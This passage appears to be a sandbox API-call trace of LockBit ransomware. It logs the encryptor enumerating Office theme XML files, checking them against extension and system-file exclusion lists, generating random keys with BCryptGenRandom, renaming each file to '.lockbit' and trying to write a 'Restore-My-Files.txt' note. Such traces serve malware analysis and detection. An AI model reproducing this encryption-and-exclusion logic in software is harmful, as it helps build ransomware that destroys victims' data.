Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Flow.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Flow.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.462] malloc (_Size=0xbc) returned 0x1fa2ed8 [0193.462] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0193.463] free (_Block=0x1fa2ed8) [0193.463] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Flow.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.463] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.463] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.463] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1614800, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf1614800, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Foundry.xml", cAlternateFileName="")) returned 1 [0193.464] lstrcmpiW (lpString1=".", lpString2="Foundry.xml") returned -1 [0193.464] lstrcmpiW (lpString1="..", lpString2="Foundry.xml") returned -1 [0193.464] PathFindExtensionW (pszPath="Foundry.xml") returned=".xml" [0193.464] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.464] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.465] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Foundry.xml") returned 1 [0193.465] lstrcmpiW (lpString1="ntldr", lpString2="Foundry.xml") returned 1 [0193.466] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Foundry.xml") returned 1 [0193.466] lstrcmpiW (lpString1="bootsect.bak", lpString2="Foundry.xml") returned -1 [0193.466] lstrcmpiW (lpString1="autorun.inf", lpString2="Foundry.xml") returned -1 [0193.466] lstrcmpiW (lpString1="thumbs.db", lpString2="Foundry.xml") returned 1 [0193.466] lstrcmpiW (lpString1="iconcache.db", lpString2="Foundry.xml") returned 1 [0193.466] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.466] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Foundry.xml") returned=".xml" [0193.466] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.466] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.466] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.467] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.467] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.467] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.467] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.467] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.467] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.467] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.467] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.467] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.467] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Foundry.xml.lockbit") returned 86 [0193.467] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Foundry.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\foundry.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0193.468] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.468] malloc (_Size=0x40068) returned 0x3e70008 [0193.468] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=962) returned 1 [0193.468] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.469] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0193.469] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.469] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0193.469] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0193.474] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Foundry.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Foundry.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.474] malloc (_Size=0xc2) returned 0x1fa2ed8 [0193.474] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0193.475] free (_Block=0x1fa2ed8) [0193.475] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Foundry.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.475] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.475] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.476] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99314000, ftCreationTime.dwHighDateTime=0x1c6ba8b, ftLastAccessTime.dwLowDateTime=0x603ce830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x99314000, ftLastWriteTime.dwHighDateTime=0x1c6ba8b, nFileSizeHigh=0x0, nFileSizeLow=0x3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Grayscale.xml", cAlternateFileName="GRAYSC~1.XML")) returned 1 [0193.476] lstrcmpiW (lpString1=".", lpString2="Grayscale.xml") returned -1 [0193.476] lstrcmpiW (lpString1="..", lpString2="Grayscale.xml") returned -1 [0193.476] PathFindExtensionW (pszPath="Grayscale.xml") returned=".xml" [0193.476] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.476] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.477] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.478] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.478] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.478] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.478] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.478] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.478] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.478] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.478] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.478] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Grayscale.xml") returned 1 [0193.478] lstrcmpiW (lpString1="ntldr", lpString2="Grayscale.xml") returned 1 [0193.478] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Grayscale.xml") returned 1 [0193.478] lstrcmpiW (lpString1="bootsect.bak", lpString2="Grayscale.xml") returned -1 [0193.478] lstrcmpiW (lpString1="autorun.inf", lpString2="Grayscale.xml") returned -1 [0193.478] lstrcmpiW (lpString1="thumbs.db", lpString2="Grayscale.xml") returned 1 [0193.478] lstrcmpiW (lpString1="iconcache.db", lpString2="Grayscale.xml") returned 1 [0193.478] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.478] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grayscale.xml") returned=".xml" [0193.478] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.478] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.478] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.478] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.478] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.478] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.478] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.478] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.479] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.479] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grayscale.xml.lockbit") returned 88 [0193.479] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grayscale.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\grayscale.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0193.486] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.486] malloc (_Size=0x40068) returned 0x1ff1e60 [0193.486] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=928) returned 1 [0193.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0193.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.487] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0193.487] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0193.489] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grayscale.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grayscale.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.489] malloc (_Size=0xc6) returned 0x1fa2ed8 [0193.489] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0193.490] free (_Block=0x1fa2ed8) [0193.490] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grayscale.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.490] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.490] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.490] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a54500, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x603ce830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a54500, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Grid.xml", cAlternateFileName="")) returned 1 [0193.490] lstrcmpiW (lpString1=".", lpString2="Grid.xml") returned -1 [0193.490] lstrcmpiW (lpString1="..", lpString2="Grid.xml") returned -1 [0193.490] PathFindExtensionW (pszPath="Grid.xml") returned=".xml" [0193.490] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.490] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.490] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.490] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.490] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.490] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.490] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.490] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.490] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.490] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.490] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.490] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.490] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.491] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.492] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.492] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.492] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.492] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.492] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.492] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.492] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.492] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.492] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.492] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Grid.xml") returned 1 [0193.492] lstrcmpiW (lpString1="ntldr", lpString2="Grid.xml") returned 1 [0193.492] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Grid.xml") returned 1 [0193.492] lstrcmpiW (lpString1="bootsect.bak", lpString2="Grid.xml") returned -1 [0193.492] lstrcmpiW (lpString1="autorun.inf", lpString2="Grid.xml") returned -1 [0193.492] lstrcmpiW (lpString1="thumbs.db", lpString2="Grid.xml") returned 1 [0193.492] lstrcmpiW (lpString1="iconcache.db", lpString2="Grid.xml") returned 1 [0193.492] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.492] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grid.xml") returned=".xml" [0193.492] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.492] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.492] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.492] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.492] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 